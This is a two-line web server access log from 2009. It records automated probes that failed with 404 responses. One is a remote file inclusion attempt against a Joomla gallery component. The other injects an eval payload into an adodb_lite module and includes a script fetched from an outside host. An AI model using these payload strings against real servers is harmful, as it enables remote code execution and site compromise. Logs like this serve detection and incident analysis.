211.47.71.89 - - [12/Oct/2009:02:23:46 -0400] "GET /logs/error_log.Q109071600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:24:01 -0400] "GET /logs/access_log.Q109070300%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
